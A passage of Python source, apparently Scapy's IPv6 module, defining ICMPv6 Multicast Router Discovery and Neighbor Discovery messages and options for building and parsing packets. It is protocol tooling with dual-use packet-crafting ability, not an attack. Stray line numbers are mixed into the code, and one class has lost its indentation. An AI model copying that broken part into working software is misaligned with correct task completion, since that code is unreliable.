        return isinstance(query, ICMPv6MLQuery2)
1678
1679
1680# ICMPv6 MRD - Multicast Router Discovery (RFC 4286) #
1681
1682# TODO:
1683# - 04/09/06 troglocan : find a way to automatically add a router alert
1684# option for all MRD packets. This could be done in a specific
1685# way when IPv6 is the under layer with some specific keyword
1686# like 'exthdr'. This would allow to keep compatibility with
1687# providing IPv6 fields to be overloaded in fields_desc.
1688#
1689# At the moment, if user inserts an IPv6 Router alert option
1690# none of the IPv6 default values of IPv6 layer will be set.
1691
class ICMPv6MRD_Advertisement(_ICMPv6):
    """
    Multicast Router Discovery Advertisement (type 151). The underlying
    IPv6 layer gets ff02::2 as destination and a hop limit of 1.
    """
    name = "ICMPv6 Multicast Router Discovery Advertisement"
    fields_desc = [ByteEnumField("type", 151, icmp6types),
                   ByteField("advinter", 20),
                   XShortField("cksum", None),
                   ShortField("queryint", 0),
                   ShortField("robustness", 0)]
    overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
    # IPv6 Router Alert requires manual inclusion

    def extract_padding(self, s):
        # Split the remaining bytes after the first 8 ones
        return s[:8], s[8:]
1704
1705
class ICMPv6MRD_Solicitation(_ICMPv6):
    """
    Multicast Router Discovery Solicitation (type 152). The underlying
    IPv6 layer gets ff02::2 as destination and a hop limit of 1.
    """
    name = "ICMPv6 Multicast Router Discovery Solicitation"
    fields_desc = [ByteEnumField("type", 152, icmp6types),
                   ByteField("res", 0),
                   XShortField("cksum", None)]
    overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
    # IPv6 Router Alert requires manual inclusion

    def extract_padding(self, s):
        # Split the remaining bytes after the first 4 ones
        return s[:4], s[4:]
1716
1717
class ICMPv6MRD_Termination(_ICMPv6):
    """
    Multicast Router Discovery Termination (type 153). The underlying IPv6
    layer gets ff02::6A as destination and a hop limit of 1.
    """
    name = "ICMPv6 Multicast Router Discovery Termination"
    fields_desc = [ByteEnumField("type", 153, icmp6types),
                   ByteField("res", 0),
                   XShortField("cksum", None)]
    overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"}}
    # IPv6 Router Alert requires manual inclusion

    def extract_padding(self, s):
        # Split the remaining bytes after the first 4 ones
        return s[:4], s[4:]
1728
1729
1730# ICMPv6 Neighbor Discovery (RFC 2461) #
1731
# Neighbor Discovery option type value -> human readable name of the option.
icmp6ndopts = {1: "Source Link-Layer Address",
               2: "Target Link-Layer Address",
               3: "Prefix Information",
               4: "Redirected Header",
               5: "MTU",
               6: "NBMA Shortcut Limit Option",  # RFC2491
               7: "Advertisement Interval Option",
               8: "Home Agent Information Option",
               9: "Source Address List",
               10: "Target Address List",
               11: "CGA Option",            # RFC 3971
               12: "RSA Signature Option",  # RFC 3971
               13: "Timestamp Option",      # RFC 3971
               14: "Nonce option",          # RFC 3971
               15: "Trust Anchor Option",   # RFC 3971
               16: "Certificate Option",    # RFC 3971
               17: "IP Address Option",                             # RFC 4068
               18: "New Router Prefix Information Option",          # RFC 4068
               19: "Link-layer Address Option",                     # RFC 4068
               20: "Neighbor Advertisement Acknowledgement Option",
               21: "CARD Request Option",  # RFC 4065/4066/4067
               22: "CARD Reply Option",   # RFC 4065/4066/4067
               23: "MAP Option",          # RFC 4140
               24: "Route Information Option",  # RFC 4191
               25: "Recursive DNS Server Option",
               26: "IPv6 Router Advertisement Flags Option"
               }
1759
# Neighbor Discovery option type value -> name of the class implementing
# that option. It is looked up with the first byte of the option data by
# _ICMPv6NDGuessPayload.guess_payload_class(); types without an entry fall
# back to ICMPv6NDOptUnknown there.
icmp6ndoptscls = {1: "ICMPv6NDOptSrcLLAddr",
                  2: "ICMPv6NDOptDstLLAddr",
                  3: "ICMPv6NDOptPrefixInfo",
                  4: "ICMPv6NDOptRedirectedHdr",
                  5: "ICMPv6NDOptMTU",
                  6: "ICMPv6NDOptShortcutLimit",
                  7: "ICMPv6NDOptAdvInterval",
                  8: "ICMPv6NDOptHAInfo",
                  9: "ICMPv6NDOptSrcAddrList",
                  10: "ICMPv6NDOptTgtAddrList",
                  # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py
                  # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py
                  # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py
                  # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py
                  # 15: Do Me,
                  # 16: Do Me,
                  17: "ICMPv6NDOptIPAddr",
                  18: "ICMPv6NDOptNewRtrPrefix",
                  19: "ICMPv6NDOptLLA",
                  # 20: Do Me,
                  # 21: Do Me,
                  # 22: Do Me,
                  23: "ICMPv6NDOptMAP",
                  24: "ICMPv6NDOptRouteInfo",
                  25: "ICMPv6NDOptRDNSS",
                  26: "ICMPv6NDOptEFA",
                  31: "ICMPv6NDOptDNSSL",
                  37: "ICMPv6NDOptCaptivePortal",
                  38: "ICMPv6NDOptPREF64",
                  }
1792
# Names of the 2-bit preference values, used as the enumeration of the 'prf'
# field of ICMPv6NDOptRouteInfo.
icmp6ndraprefs = {0: "Medium (default)",
                  1: "High",
                  2: "Reserved",
                  3: "Low"}  # RFC 4191
1797
1798
1799class _ICMPv6NDGuessPayload:
1800 name = "Dummy ND class that implements guess_payload_class()"
1801
1802 def guess_payload_class(self, p):
1803 if len(p) > 1:
1804 return icmp6ndoptscls.get(orb(p[0]), ICMPv6NDOptUnknown)
1805
1806
1807# Beginning of ICMPv6 Neighbor Discovery Options.
1808
class ICMPv6NDOptDataField(StrLenField):
    """
    String field holding the data of a Neighbor Discovery option.

    On build, the value is padded with zero bytes so that its length plus
    2 is a multiple of 8. On dissection, trailing zero bytes are removed
    when 'strip_zeros' is set.
    """
    __slots__ = ["strip_zeros"]

    def __init__(self, name, default, strip_zeros=False, **kwargs):
        super().__init__(name, default, **kwargs)
        self.strip_zeros = strip_zeros

    def i2len(self, pkt, x):
        # The length is the one of the padded value
        padded = self.i2m(pkt, x)
        return len(padded)

    def i2m(self, pkt, x):
        # Bytes in excess of the last 8-byte boundary, counting 2 extra
        # bytes on top of the value itself
        excess = (len(x) + 2) % 8
        if excess:
            x += b"\x00" * (8 - excess)
        return x

    def m2i(self, pkt, x):
        return x.rstrip(b"\x00") if self.strip_zeros else x
1829
1830
class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
    """
    Fallback Neighbor Discovery option: type, length and opaque data.

    When 'len' is left to None it is computed as (2 + data length) // 8.
    On dissection the data spans 8 * max(len, 1) - 2 bytes, so a 'len' of 0
    is handled like a 'len' of 1.
    """
    name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
    fields_desc = [ByteField("type", 0),
                   FieldLenField("len", None, length_of="data", fmt="B",
                                 adjust=lambda pkt, x: (2 + x) // 8),
                   ICMPv6NDOptDataField("data", "", strip_zeros=False,
                                        length_from=lambda pkt:
                                        8 * max(pkt.len, 1) - 2)]
1839
# NOTE: len includes the type and len fields. It is expressed in units of
#       8 bytes.
# TODO: Revisit the use of ETHER_ANY
1842
1843
class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
    """
    Neighbor Discovery Source Link-Layer Address option (type 1): a fixed
    'len' of 1 and a MAC address.
    """
    name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
    fields_desc = [ByteField("type", 1),
                   ByteField("len", 1),
                   SourceMACField("lladdr")]

    def mysummary(self):
        return self.sprintf("%name% %lladdr%")
1852
1853
class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
    """
    Neighbor Discovery option of type 2: same layout as
    ICMPv6NDOptSrcLLAddr, only the default type differs.
    """
    name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
    type = 2
1857
1858
class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
    """
    Neighbor Discovery Prefix Information option (type 3): prefix length,
    L / A / R flags, valid and preferred lifetimes and the prefix itself.
    """
    name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
    fields_desc = [ByteField("type", 3),
                   ByteField("len", 4),
                   ByteField("prefixlen", 64),
                   BitField("L", 1, 1),
                   BitField("A", 1, 1),
                   BitField("R", 0, 1),
                   BitField("res1", 0, 5),
                   XIntField("validlifetime", 0xffffffff),
                   XIntField("preferredlifetime", 0xffffffff),
                   XIntField("res2", 0x00000000),
                   IP6Field("prefix", "::")]

    def mysummary(self):
        return self.sprintf("%name% %prefix%/%prefixlen% "
                            "On-link %L% Autonomous Address %A% "
                            "Router Address %R%")
1877
1878# TODO: We should also limit the size of included packet to something
1879# like (initiallen - 40 - 2)
1880
1881
class TruncPktLenField(PacketLenField):
    """
    Packet field whose built value is truncated to the largest multiple of
    8 bytes that fits in it.
    """

    def i2m(self, pkt, x):
        built = bytes(x)
        # Drop the trailing bytes beyond the last 8-byte boundary
        kept = len(built) - len(built) % 8
        return built[:kept]

    def i2len(self, pkt, i):
        # The length is the one of the truncated value
        truncated = self.i2m(pkt, i)
        return len(truncated)
1890
1891
class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
    """
    Neighbor Discovery Redirected Header option (type 4): 6 reserved bytes
    followed by an IPv6 packet.

    When 'len' is left to None it is computed as (packet length + 8) // 8;
    on dissection the packet spans 8 * len - 8 bytes.
    """
    name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
    fields_desc = [ByteField("type", 4),
                   FieldLenField("len", None, length_of="pkt", fmt="B",
                                 adjust=lambda pkt, x: (x + 8) // 8),
                   MayEnd(StrFixedLenField("res", b"\x00" * 6, 6)),
                   TruncPktLenField("pkt", b"", IPv6,
                                    length_from=lambda pkt: 8 * pkt.len - 8)]
1900
1901# See which value should be used for default MTU instead of 1280
1902
1903
class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
    """
    Neighbor Discovery MTU option (type 5), with an 'mtu' value that
    defaults to 1280.
    """
    name = "ICMPv6 Neighbor Discovery Option - MTU"
    fields_desc = [ByteField("type", 5),
                   ByteField("len", 1),
                   XShortField("res", 0),
                   IntField("mtu", 1280)]

    def mysummary(self):
        return self.sprintf("%name% %mtu%")
1913
1914
class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet):  # RFC 2491
    """
    Neighbor Discovery NBMA Shortcut Limit option (type 6), with a
    'shortcutlim' value that defaults to 40.
    """
    name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
    fields_desc = [ByteField("type", 6),
                   ByteField("len", 1),
                   ByteField("shortcutlim", 40),  # XXX
                   ByteField("res1", 0),
                   IntField("res2", 0)]
1922
1923
class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
    """
    Neighbor Discovery Advertisement Interval option (type 7). The summary
    reports 'advint' in milliseconds.
    """
    name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
    fields_desc = [ByteField("type", 7),
                   ByteField("len", 1),
                   ShortField("res", 0),
                   IntField("advint", 0)]

    def mysummary(self):
        return self.sprintf("%name% %advint% milliseconds")
1933
1934
class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
    """
    Neighbor Discovery Home Agent Information option (type 8): a preference
    and a lifetime. The summary reports 'lifetime' in seconds.
    """
    name = "ICMPv6 Neighbor Discovery - Home Agent Information"
    fields_desc = [ByteField("type", 8),
                   ByteField("len", 1),
                   ShortField("res", 0),
                   ShortField("pref", 0),
                   ShortField("lifetime", 1)]

    def mysummary(self):
        return self.sprintf("%name% %pref% %lifetime% seconds")
1945
1946# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
1947
1948# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
1949
1950
class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
    """
    Neighbor Discovery IP Address option (type 17): an option code, a
    prefix length and an IPv6 address.
    """
    name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
    fields_desc = [ByteField("type", 17),
                   ByteField("len", 3),
                   ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
                                                2: "New Care-Of Address",
                                                3: "NAR's IP address"}),
                   ByteField("plen", 64),
                   IntField("res", 0),
                   IP6Field("addr", "::")]
1961
1962
class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
    """
    Neighbor Discovery New Router Prefix Information option (type 18): an
    option code, a prefix length and an IPv6 prefix.
    """
    name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)"  # noqa: E501
    fields_desc = [ByteField("type", 18),
                   ByteField("len", 3),
                   ByteField("optcode", 0),
                   ByteField("plen", 64),
                   IntField("res", 0),
                   IP6Field("prefix", "::")]
1971
1972
# Names of the option codes of the RFC 4068 Link-Layer Address option, used
# as the enumeration of the 'optcode' field of ICMPv6NDOptLLA.
_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
                        1: "LLA for the new AP",
                        2: "LLA of the MN",
                        3: "LLA of the NAR",
                        4: "LLA of the src of TrSolPr or PrRtAdv msg",
                        5: "AP identified by LLA belongs to current iface of router",  # noqa: E501
                        6: "No preifx info available for AP identified by the LLA",  # noqa: E501
                        7: "No fast handovers support for AP identified by the LLA"}  # noqa: E501
1981
1982
class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet):     # RFC 4068
    """
    Neighbor Discovery Link-Layer Address option (type 19): an option code
    followed by a MAC address.
    """
    name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)"  # noqa: E501
    fields_desc = [ByteField("type", 19),
                   ByteField("len", 1),
                   ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
                   MACField("lla", ETHER_ANY)]  # We only support ethernet
1989
1990
class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet):     # RFC 4140
    """
    Neighbor Discovery MAP option (type 23): 4-bit distance, 4-bit
    preference, R flag, valid lifetime and an IPv6 address.
    """
    name = "ICMPv6 Neighbor Discovery - MAP Option"
    fields_desc = [ByteField("type", 23),
                   ByteField("len", 3),
                   BitField("dist", 1, 4),
                   BitField("pref", 15, 4),  # highest availability
                   BitField("R", 1, 1),
                   BitField("res", 0, 7),
                   IntField("validlifetime", 0xffffffff),
                   IP6Field("addr", "::")]
2001
2002
class _IP6PrefixField(IP6Field):
    """
    IPv6 prefix field whose size on the wire depends on the 'len' field of
    the packet: 8 * (len - 1) bytes.
    """
    __slots__ = ["length_from"]

    def __init__(self, name, default):
        IP6Field.__init__(self, name, default)
        self.length_from = lambda pkt: 8 * (pkt.len - 1)

    def addfield(self, pkt, s, val):
        encoded = self.i2m(pkt, val)
        return s + encoded

    def getfield(self, pkt, s):
        size = self.length_from(pkt)
        prefix, remain = s[:size], s[size:]
        if size < 16:
            # Complete short prefixes with zeros up to a full address
            prefix += b'\x00' * (16 - size)
        return remain, self.m2i(pkt, prefix)

    def i2len(self, pkt, x):
        encoded = self.i2m(pkt, x)
        return len(encoded)

    def i2m(self, pkt, x):
        units = pkt.len

        if x is None:
            # No prefix given: use "::", and consider that 'len' is 1 when
            # it is not set either
            x = "::"
            if units is None:
                units = 1
        packed = inet_pton(socket.AF_INET6, x)

        if units is None:
            # 'len' is not set: the whole address is used
            return packed
        if units in (0, 1):
            return b""
        if units in (2, 3):
            # 8 or 16 bytes of prefix
            return packed[:8 * (units - 1)]

        # Larger 'len': the full address followed by zero padding
        return packed + b'\x00' * 8 * (units - 3)
2040
2041
class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet):  # RFC 4191
    # Neighbor Discovery option with default type 24. When "len" is left to
    # None it is computed from the encoded prefix size as size // 8 + 1.
    name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
    fields_desc = [ByteField("type", 24),
                   FieldLenField("len", None, length_of="prefix", fmt="B",
                                 adjust=lambda pkt, x: x // 8 + 1),
                   ByteField("plen", None),
                   BitField("res1", 0, 3),
                   BitEnumField("prf", 0, 2, icmp6ndraprefs),
                   BitField("res2", 0, 3),
                   IntField("rtlifetime", 0xffffffff),
                   _IP6PrefixField("prefix", None)]

    def mysummary(self):
        # One-line summary: name, prefix/plen and the preference label
        return self.sprintf("%name% %prefix%/%plen% Preference %prf%")
2056
2057
class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet):  # RFC 5006
    # Neighbor Discovery option with default type 25 carrying a list of
    # IPv6 addresses. When "len" is None it is computed as
    # 2 * (number of addresses) + 1; on dissection the list is read from
    # 8 * (len - 1) bytes.
    name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
    fields_desc = [ByteField("type", 25),
                   FieldLenField("len", None, count_of="dns", fmt="B",
                                 adjust=lambda pkt, x: 2 * x + 1),
                   ShortField("res", None),
                   IntField("lifetime", 0xffffffff),
                   IP6ListField("dns", [],
                                length_from=lambda pkt: 8 * (pkt.len - 1))]

    def mysummary(self):
        # Name followed by the comma-separated server addresses
        return self.sprintf("%name% ") + ", ".join(self.dns)
2070
2071
class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet):  # RFC 5175 (prev. 5075)
    # Neighbor Discovery option with default type 26: type, len and a single
    # 48-bit field named "res".
    name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
    fields_desc = [ByteField("type", 26),
                   ByteField("len", 1),
                   BitField("res", 0, 48)]
2077
2078# As required in Sect 8. of RFC 3315, Domain Names must be encoded as
2079# described in section 3.1 of RFC 1035
2080# XXX Label should be at most 63 octets in length : we do not enforce it
2081# Total length of domain should be 255 : we do not enforce it either
2082
2083
class DomainNameListField(StrLenField):
    """List of domain names in length-prefixed label encoding.

    The human/internal value is a list of dotted names (``str``). On the
    wire each label is prefixed by its length in bytes and each name ends
    with a null byte. With ``padded=True`` the encoded list is zero-padded
    to a multiple of ``padded_unit`` bytes, and empty names (padding) are
    skipped when decoding.
    """
    __slots__ = ["padded"]
    islist = 1
    padded_unit = 8

    def __init__(self, name, default, length_from=None, padded=False):  # noqa: E501
        self.padded = padded
        StrLenField.__init__(self, name, default, length_from=length_from)

    def i2len(self, pkt, x):
        return len(self.i2m(pkt, x))

    def i2h(self, pkt, x):
        # Normalize any empty value (None, b"", ...) to an empty list
        if not x:
            return []
        return x

    def m2i(self, pkt, x):
        """Decode wire data into a list of dotted names (with trailing dot)."""
        # Work on bytes: the length prefixes count bytes, not characters,
        # so labels are only decoded to str once they have been cut out.
        x = bytes_encode(x)
        res = []
        while x:
            # Get a name until \x00 is reached
            cur = []
            while x and orb(x[0]) != 0:
                tmp_len = orb(x[0])
                cur.append(plain_str(x[1:tmp_len + 1]))
                x = x[tmp_len + 1:]
            if self.padded:
                # Discard following \x00 in padded mode
                if cur:
                    res.append(".".join(cur) + ".")
            else:
                # Store the current name
                res.append(".".join(cur) + ".")
            if x and orb(x[0]) == 0:
                x = x[1:]
        return res

    def i2m(self, pkt, x):
        """Encode a list of dotted names into wire format."""
        def encode_name(dotted):
            # Encode each label first so that the length prefix is the
            # number of bytes actually written (matters for non-ASCII).
            encoded = (label.encode("utf8") for label in dotted.split('.'))
            wire = b"".join(chb(len(lbl)) + lbl for lbl in encoded)
            # A name written with a trailing dot already ends with the
            # empty root label; otherwise add the terminating null byte.
            if wire and orb(wire[-1]) == 0:
                return wire
            return wire + b'\x00'

        ret_string = b"".join(encode_name(y) for y in x)

        # In padded mode, add some \x00 bytes
        if self.padded and not len(ret_string) % self.padded_unit == 0:
            ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit)  # noqa: E501

        return ret_string
2136
2137
class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet):  # RFC 6106
    # Neighbor Discovery option with default type 31 carrying a padded list
    # of domain names. When "len" is None it is computed from the encoded
    # list size as 1 + size // 8; on dissection the list is read from
    # 8 * len - 8 bytes.
    name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
    fields_desc = [ByteField("type", 31),
                   FieldLenField("len", None, length_of="searchlist", fmt="B",
                                 adjust=lambda pkt, x: 1 + x // 8),
                   ShortField("res", None),
                   IntField("lifetime", 0xffffffff),
                   DomainNameListField("searchlist", [],
                                       length_from=lambda pkt: 8 * pkt.len - 8,
                                       padded=True)
                   ]

    def mysummary(self):
        # Name followed by the comma-separated search domains
        return self.sprintf("%name% ") + ", ".join(self.searchlist)
2152
2153
class ICMPv6NDOptCaptivePortal(_ICMPv6NDGuessPayload, Packet):  # RFC 8910
    # Neighbor Discovery option with default type 37 carrying a URI. When
    # "len" is None it is computed as (2 + URI field length) // 8; on
    # dissection the URI is read from 8 * max(len, 1) - 2 bytes, so a len
    # of 0 is handled like 1.
    # NOTE(review): the floor division assumes the URI field length already
    # accounts for padding to an 8-byte boundary -- confirm in
    # ICMPv6NDOptDataField.
    name = "ICMPv6 Neighbor Discovery Option - Captive-Portal Option"
    fields_desc = [ByteField("type", 37),
                   FieldLenField("len", None, length_of="URI", fmt="B",
                                 adjust=lambda pkt, x: (2 + x) // 8),
                   ICMPv6NDOptDataField("URI", "", strip_zeros=True,
                                        length_from=lambda pkt:
                                        8 * max(pkt.len, 1) - 2)]

    def mysummary(self):
        return self.sprintf("%name% %URI%")
2165
2166
class _PREF64(IP6Field):
    """IPv6 field that only carries the first 12 bytes of the address."""

    def addfield(self, pkt, s, val):
        # Encode the full address, then keep its 12 leading bytes
        packed = self.i2m(pkt, val)
        return s + packed[:12]

    def getfield(self, pkt, s):
        # Rebuild a 16-byte address by appending 4 zero bytes
        head, remain = s[:12], s[12:]
        return remain, self.m2i(pkt, head + b"\x00" * 4)
2173
2174
class ICMPv6NDOptPREF64(_ICMPv6NDGuessPayload, Packet):  # RFC 8781
    # Neighbor Discovery option with default type 38: a 13-bit scaled
    # lifetime, a 3-bit prefix length code ("plc") and a prefix stored on
    # 12 bytes (see _PREF64).
    name = "ICMPv6 Neighbor Discovery Option - PREF64 Option"
    fields_desc = [ByteField("type", 38),
                   ByteField("len", 2),
                   BitField("scaledlifetime", 0, 13),
                   BitEnumField("plc", 0, 3,
                                ["/96", "/64", "/56", "/48", "/40", "/32"]),
                   _PREF64("prefix", "::")]

    def mysummary(self):
        # Only plc values 0..5 have a label; others are reported as invalid
        plc = self.sprintf("%plc%") if self.plc < 6 else f"[invalid PLC({self.plc})]"
        return self.sprintf("%name% %prefix%") + plc
2187
2188# End of ICMPv6 Neighbor Discovery Options.
2189
2190
class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
    # ICMPv6 message with default type 133. When stacked on IPv6, the IPv6
    # defaults are overloaded with nh=58, dst=ff02::2 and hlim=255.
    name = "ICMPv6 Neighbor Discovery - Router Solicitation"
    fields_desc = [ByteEnumField("type", 133, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   IntField("res", 0)]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}}
2198
2199
class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
    # ICMPv6 message with default type 134. The flag byte is split into
    # M, O, H (1 bit each), prf (2 bits), P (1 bit) and res (2 bits).
    # When stacked on IPv6, the IPv6 defaults are overloaded with nh=58,
    # dst=ff02::1 and hlim=255.
    name = "ICMPv6 Neighbor Discovery - Router Advertisement"
    fields_desc = [ByteEnumField("type", 134, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   ByteField("chlim", 0),
                   BitField("M", 0, 1),
                   BitField("O", 0, 1),
                   BitField("H", 0, 1),
                   BitEnumField("prf", 1, 2, icmp6ndraprefs),  # RFC 4191
                   BitField("P", 0, 1),
                   BitField("res", 0, 2),
                   ShortField("routerlifetime", 1800),
                   IntField("reachabletime", 0),
                   IntField("retranstimer", 0)]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def answers(self, other):
        # Any Router Solicitation is considered answered by this message
        return isinstance(other, ICMPv6ND_RS)

    def mysummary(self):
        return self.sprintf("%name% Lifetime %routerlifetime% "
                            "Hop Limit %chlim% Preference %prf% "
                            "Managed %M% Other %O% Home %H%")
2224
2225
class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    # ICMPv6 message with default type 135 carrying a target address.
    # When stacked on IPv6, the IPv6 defaults are overloaded with nh=58,
    # dst=ff02::1 and hlim=255.
    name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
    fields_desc = [ByteEnumField("type", 135, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   IntField("res", 0),
                   IP6Field("tgt", "::")]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def mysummary(self):
        return self.sprintf("%name% (tgt: %tgt%)")

    def hashret(self):
        # Hash on the target address (plus whatever the payload contributes)
        return bytes_encode(self.tgt) + self.payload.hashret()
2240
2241
class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    # ICMPv6 message with default type 136: R, S and O flag bits, 29
    # reserved bits and a target address. When stacked on IPv6, the IPv6
    # defaults are overloaded with nh=58, dst=ff02::1 and hlim=255.
    name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
    fields_desc = [ByteEnumField("type", 136, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   BitField("R", 1, 1),
                   BitField("S", 0, 1),
                   BitField("O", 1, 1),
                   XBitField("res", 0, 29),
                   IP6Field("tgt", "::")]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def mysummary(self):
        return self.sprintf("%name% (tgt: %tgt%)")

    def hashret(self):
        # Same hash as ICMPv6ND_NS: target address plus payload hash
        return bytes_encode(self.tgt) + self.payload.hashret()

    def answers(self, other):
        # Answers a Neighbor Solicitation asking for the same target
        return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt
2262
2263# associated possible options : target link-layer option, Redirected header
2264
2265
class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    # ICMPv6 message with default type 137 carrying two IPv6 addresses,
    # "tgt" and "dst". When stacked on IPv6, the IPv6 defaults are
    # overloaded with nh=58, dst=ff02::1 and hlim=255.
    name = "ICMPv6 Neighbor Discovery - Redirect"
    fields_desc = [ByteEnumField("type", 137, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XIntField("res", 0),
                   IP6Field("tgt", "::"),
                   IP6Field("dst", "::")]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2275
2276
2277# ICMPv6 Inverse Neighbor Discovery (RFC 3122) #
2278
class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
    # Option with default type 9 carrying a list of IPv6 addresses after 6
    # reserved bytes. When "len" is None it is computed as
    # 2 * (number of addresses) + 1; on dissection the list is read from
    # 8 * (len - 1) bytes.
    name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
    fields_desc = [ByteField("type", 9),
                   FieldLenField("len", None, count_of="addrlist", fmt="B",
                                 adjust=lambda pkt, x: 2 * x + 1),
                   StrFixedLenField("res", b"\x00" * 6, 6),
                   IP6ListField("addrlist", [],
                                length_from=lambda pkt: 8 * (pkt.len - 1))]
2287
2288
class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
    # Same layout as ICMPv6NDOptSrcAddrList, with type overridden to 10
    name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
    type = 10
2292
2293
# RFC3122
# Required options: source lladdr and target lladdr
# Other valid options: source address list, MTU
# - As stated in the document, it would be good to take the L2 address
#   requested in the required target lladdr option and use it as the
#   Ethernet destination address if no address is specified
# - This does not seem very practical if the user has to specify all
#   the options.
# Ether() must use the target lladdr as destination
class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
    # ICMPv6 message with default type 141: the common type/code/cksum
    # header followed by a 32-bit reserved word. When stacked on IPv6, the
    # IPv6 defaults are overloaded with nh=58, dst=ff02::1 and hlim=255.
    name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
    fields_desc = [ByteEnumField("type", 141, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XIntField("reserved", 0)]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2310
# Required options: target lladdr, target address list
# Other valid options: MTU
2313
2314
class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
    # ICMPv6 message with default type 142: the common type/code/cksum
    # header followed by a 32-bit reserved word. When stacked on IPv6, the
    # IPv6 defaults are overloaded with nh=58, dst=ff02::1 and hlim=255.
    name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
    fields_desc = [ByteEnumField("type", 142, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XIntField("reserved", 0)]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2322
2323
2324###############################################################################
2325# ICMPv6 Node Information Queries (RFC 4620)
2326###############################################################################
2327
2328# [ ] Add automatic destination address computation using computeNIGroupAddr
2329# in IPv6 class (Scapy6 modification when integrated) if :
2330# - it is not provided
2331# - upper layer is ICMPv6NIQueryName() with a valid value
2332# [ ] Try to be liberal in what we accept as internal values for _explicit_
2333# DNS elements provided by users. Any string should be considered
2334# valid and kept like it has been provided. At the moment, i2repr() will
2335# crash on many inputs
2336# [ ] Do the documentation
2337# [ ] Add regression tests
2338# [ ] Perform test against real machines (NOOP reply is proof of implementation). # noqa: E501
2339# [ ] Check if there are differences between different stacks. Among *BSD,
2340# with others.
2341# [ ] Deal with flags in a consistent way.
# [ ] Implement compression in names2dnsrepr() and decompression in
#     dnsrepr2names(). Should be deactivable.
2344
